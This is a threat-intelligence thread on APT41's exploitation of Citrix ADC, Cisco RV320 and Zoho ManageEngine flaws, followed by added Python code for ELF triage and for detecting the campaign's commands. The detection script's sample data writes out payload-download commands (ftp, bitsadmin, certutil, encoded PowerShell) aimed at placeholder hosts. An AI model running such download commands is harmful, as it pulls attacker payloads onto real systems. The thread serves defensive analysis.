BREAKING: APT41 initiated a multi-month global campaign at over 75 @FireEye customers, attempting to exploit Internet-facing systems using recently released exploits for Citrix NetScaler/ADC, Cisco routers & Zoho ManageEngine.

fireeye.com/blog/threat-re…
I've been analyzing @FireEye's telemetry over the last few months for attempts to exploit CVE-2019-19781 (Citrix ADC) and this is the first campaign I was able to find and tie to a specific threat actor.
The CVE-2019-19781 exploitation had three main phases: 1) initial reconnaissance on January 20-21, executing the command 'file /bin/pwd' (APT41 was the only actor I could find executing this command).
Then a lull in activity likely related to the Chinese Lunar New Year holidays.

Phase 2) Payload delivery on February 1st that (if successful) used FTP to download a payload named 'bsd' (if anyone has a copy of the sample - sharing is caring)
Then another lull in activity that aligns w/ China initiating broader COVID-19 quarantines. NOTE: APT41 may have remained active, which we were unable to observe.

Phase 3) Payload delivery on Feb 24-25 that downloaded a payload named 'un'. This was the largest volume of activity.
For those of you playing along at home - you may have seen a thread w/ @markpars0ns @chrisdoman @sysgoblin @bkmsft @colemankane that touched on the next two phases of APT41's exploitation attempts (Cisco RV320 routers and Zoho ManageEngine Desktop Central).

APT41 exploited a Cisco RV320 router at a telecommunications organization. About 6% of the targeting in this campaign included telecommunications organizations. Why might APT41 be interested in telcos? 🧐🧐

Remember the MESSAGETAP malware?

fireeye.com/blog/threat-re…
We're not certain what exploit was used, but there's a 2019 @metasploit module that enables remote code execution. APT41 deployed a payload named 'fuc' (a 32-bit ELF binary compiled for a 64-bit MIPS processor).

I've never seen/analyzed MIPS malware before. I assume the payload is custom.
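The first thing a triager wants from an unfamiliar MIPS sample like the 'fuc' payload above is the ELF header: class, endianness, machine, and the MIPS-specific e_flags word that records the architecture level and ABI. A "32-bit ELF for a 64-bit MIPS core" shows up as ELFCLASS32 with the EF_MIPS_ARCH_64 bits set and, typically, the n32 ABI flag (EF_MIPS_ABI2). The helper below is an added example, not code from this thread or from FireEye; the header bytes it parses are constructed to have that shape and are not the real sample.

```python
"""Added triage helper (not from the thread or FireEye): read an ELF header
and report class, endianness, machine and, for MIPS, the arch/ABI flags.
The sample header built here is constructed for the example; it is not 'fuc'."""
import struct

ELF_MAGIC = b"\x7fELF"
EM_MIPS = 0x08
E_MACHINE_NAMES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}

# MIPS-specific e_flags bits (MIPS ELF ABI supplement / binutils elf/mips.h)
EF_MIPS_ARCH_MASK = 0xF0000000
EF_MIPS_ARCH_NAMES = {
    0x00000000: "mips1", 0x10000000: "mips2", 0x20000000: "mips3",
    0x30000000: "mips4", 0x40000000: "mips5", 0x50000000: "mips32",
    0x60000000: "mips64", 0x70000000: "mips32r2", 0x80000000: "mips64r2",
}
EF_MIPS_ABI2 = 0x00000020      # n32 ABI: 32-bit ELF, 64-bit registers
EF_MIPS_ABI_O32 = 0x00001000
EF_MIPS_ABI_O64 = 0x00002000


def describe_mips_flags(e_flags: int) -> dict:
    """Decode the architecture level and ABI from a MIPS e_flags word."""
    arch = EF_MIPS_ARCH_NAMES.get(e_flags & EF_MIPS_ARCH_MASK, "unknown")
    if e_flags & EF_MIPS_ABI2:
        abi = "n32"
    elif e_flags & EF_MIPS_ABI_O32:
        abi = "o32"
    elif e_flags & EF_MIPS_ABI_O64:
        abi = "o64"
    else:
        abi = "n64/unspecified"   # ELF64 MIPS binaries carry no ABI flag bit
    return {"mips_arch": arch, "mips_abi": abi}


def parse_elf_header(data: bytes) -> dict:
    """Parse the fixed-size ELF header (52 bytes for ELF32, 64 for ELF64)."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # e_type, e_machine, e_version follow the 16-byte e_ident in both classes
    e_type, e_machine, _ = struct.unpack_from(endian + "HHI", data, 16)
    if ei_class == 1:
        # Elf32_Ehdr: e_entry, e_phoff, e_shoff, e_flags are 4 bytes each
        e_entry, e_phoff, e_shoff, e_flags = struct.unpack_from(endian + "IIII", data, 24)
    else:
        # Elf64_Ehdr: e_entry, e_phoff, e_shoff are 8 bytes, e_flags is 4
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        e_entry, e_phoff, e_shoff, e_flags = struct.unpack_from(endian + "QQQI", data, 24)
    info = {
        "class": "ELF32" if ei_class == 1 else "ELF64",
        "endian": "little" if ei_data == 1 else "big",
        "e_type": e_type,
        "machine": E_MACHINE_NAMES.get(e_machine, f"unknown(0x{e_machine:02x})"),
        "e_entry": e_entry,
        "e_flags": e_flags,
    }
    if e_machine == EM_MIPS:
        info.update(describe_mips_flags(e_flags))
    return info


def build_sample_elf32_mips_n32() -> bytes:
    """Constructed 52-byte Elf32_Ehdr only (no program headers, not runnable):
    big-endian, EM_MIPS, e_flags = EF_MIPS_ARCH_64 | EF_MIPS_ABI2."""
    e_ident = ELF_MAGIC + bytes([1, 2, 1, 0]) + b"\x00" * 8  # ELFCLASS32, ELFDATA2MSB, EV_CURRENT, SYSV
    return e_ident + struct.pack(
        ">HHIIIIIHHHHHH",
        2,            # e_type = ET_EXEC
        EM_MIPS,      # e_machine
        1,            # e_version
        0x00400000,   # e_entry
        52,           # e_phoff
        0,            # e_shoff
        0x60000020,   # e_flags = EF_MIPS_ARCH_64 | EF_MIPS_ABI2
        52, 32, 0, 40, 0, 0,   # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )


if __name__ == "__main__":
    for key, value in parse_elf_header(build_sample_elf32_mips_n32()).items():
        print(f"{key:10} {value:#x}" if isinstance(value, int) else f"{key:10} {value}")
```

Run it on a real sample with `parse_elf_header(open(path, "rb").read())`; the class/arch/ABI triple tells you which QEMU user-mode binary (qemu-mips vs qemu-mips64) and which disassembler settings to use before spending any time on the code itself.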
On March 5th, @steventseeley released proof-of-concept code for a Zoho ManageEngine zero-day (CVE-2020-10189). By March 8th, APT41 had weaponized the PoC and attempted to exploit more than a dozen organizations.

The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog...but the TL;DR is: exploit --> some combo of bitsadmin, PowerShell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode.
This isn't the first time we've observed APT41 leverage publicly available exploits to target internet facing systems. We've seen them use both CVE-2019-3396 (Atlassian Confluence) and CVE-2019-11510 (Pulse Secure VPN) as recently as October 2019.
I put my Visio skills to use and created this infographic to help summarize the APT41 exploitation activity, along with some key dates that *may* help explain the absence of activity.
Some unanswered questions I have about the activity:

The ManageEngine exploitation was ~3 days from POC release to weaponization. Why did it take ~10 days to attempt exploitation of Citrix ADC (for recon) and ~20 days to exploit it with an actual payload?
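The thread names a handful of concrete command-line indicators across the three exploitation waves: the 'file /bin/pwd' recon command on Citrix ADC, the FTP fetch of payloads named 'bsd' and 'un', execution of the 'fuc' payload on the RV320, and the bitsadmin / CertUtil / encoded-PowerShell chain after the ManageEngine exploit. The script below is an added example (not the thread author's or FireEye's code) that matches those indicators against process telemetry and flags hosts where recon was followed by a payload fetch. The record layout, every sample record and the RFC 5737 addresses are constructed for this example; the regexes are this example's own and will need tuning in a real environment.

```python
"""Added example (not from the thread or FireEye): match the command-line
indicators the thread calls out against constructed process telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    context: str
    cmdline: str


# (rule name, pattern, which part of the thread's timeline it maps to)
RULES = [
    ("citrix_recon_file_bin_pwd",
     re.compile(r"\bfile\s+/bin/pwd(?:\s|$)"),
     "CVE-2019-19781 phase 1: recon command"),
    ("citrix_ftp_payload_fetch",
     re.compile(r"\bftp\b.*/(?:bsd|un)(?:\s|$)"),
     "CVE-2019-19781 phase 2/3: FTP fetch of 'bsd' or 'un'"),
    ("rv320_fuc_payload_exec",
     re.compile(r"(?:^|/)fuc(?:\s|$)"),
     "Cisco RV320: MIPS payload 'fuc'"),
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I),
     "CVE-2020-10189 chain: bitsadmin download"),
    ("certutil_urlcache_fetch",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\s-f\b", re.I),
     "CVE-2020-10189 chain: certutil download"),
    ("powershell_encoded_command",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.I),
     "CVE-2020-10189 chain: encoded PowerShell"),
]

# Constructed sample telemetry (hosts, users and command lines are made up).
SAMPLE_EVENTS = [
    Event("adc-01", "nobody", "file /bin/pwd"),
    Event("adc-01", "nobody", "ftp -o /tmp/bsd http://198.51.100.7/bsd"),
    Event("adc-02", "nobody", "ftp -o /tmp/un http://198.51.100.7/un"),
    Event("rv320-edge", "root", "/tmp/fuc"),
    Event("win-srv01", "SYSTEM", r"bitsadmin /transfer job http://203.0.113.9/x.exe C:\Windows\Temp\x.exe"),
    Event("win-srv01", "SYSTEM", r"certutil -urlcache -split -f http://203.0.113.9/b.txt C:\Windows\Temp\b.txt"),
    Event("win-srv01", "SYSTEM", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    Event("build-01", "ci", "file /usr/bin/pwd"),                                         # benign lookalike
    Event("adc-02", "nobody", "ftp -o /tmp/update.tgz http://198.51.100.7/update.tgz"),   # benign fetch
]


def scan(events) -> list:
    """Apply every rule to every event; one Finding per (event, rule) hit."""
    findings = []
    for ev in events:
        for name, pattern, context in RULES:
            if pattern.search(ev.cmdline):
                findings.append(Finding(ev.host, name, context, ev.cmdline))
    return findings


def summarize(findings) -> dict:
    """Count findings per rule name."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def hosts_with_recon_and_payload(findings) -> set:
    """Hosts that show both the phase-1 recon command and a payload fetch:
    the strongest signal in this telemetry that exploitation succeeded."""
    recon = {f.host for f in findings if f.rule == "citrix_recon_file_bin_pwd"}
    payload = {f.host for f in findings if f.rule == "citrix_ftp_payload_fetch"}
    return recon & payload


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host:12} {f.rule:28} {f.context}")
    print("recon + payload on:", sorted(hosts_with_recon_and_payload(results)))
```

The 'un' and 'bsd' names are weak on their own (short, common strings), which is why the rule anchors them as the final path component of an ftp command line rather than matching the bare word; the recon command and the Windows LOLBin patterns are the higher-confidence hits, and a host that trips both a recon rule and a fetch rule is the one to triage first.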
Thread by Christopher Glyer